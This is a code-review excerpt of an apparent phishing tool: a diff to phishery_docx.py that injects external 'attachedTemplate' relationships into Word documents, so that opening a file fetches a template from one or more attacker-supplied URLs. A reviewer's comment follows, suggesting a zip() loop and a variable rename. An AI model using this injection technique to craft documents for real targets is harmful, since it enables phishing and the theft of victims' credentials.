client/phishery_docx.py

```diff
@@ -18,45 +23,74 @@ def path_is_doc_file(path):
 	return True
 
 def phishery_inject(input_file, https_url, output_file=None):
+	target_string = '<Relationship Id="{rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target_url}" TargetMode="External"/>'
 	input_file = os.path.abspath(input_file)
-	patches = {}
-	rid = 'rId' + str(random.randint(10000, 99999))
+	https_urls = https_url.split()
+	rids = []
+	while len(rids) < len(https_urls):
+		rid = 'rId' + str(random.randint(10000, 99999))
+		if rid not in rids:
+			rids.append(rid)
+
 	settings = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
 	settings += '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
-	settings += '<Relationship Id="{rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target_url}" TargetMode="External"/>'
+	for url in https_urls:
+		settings += target_string.format(rid=rids[https_urls.index(url)], target_url=url)
```

Comment:
This would be a good use case to instead do: `for rid, url, in zip(rids, https_urls):` since `len(rids) == len(https_urls)`, it would make it more readable and you won't have to extract by index. Also `https_urls` should probably be renamed to `document_urls` since we're supporting other schemes than HTTP and HTTPS now.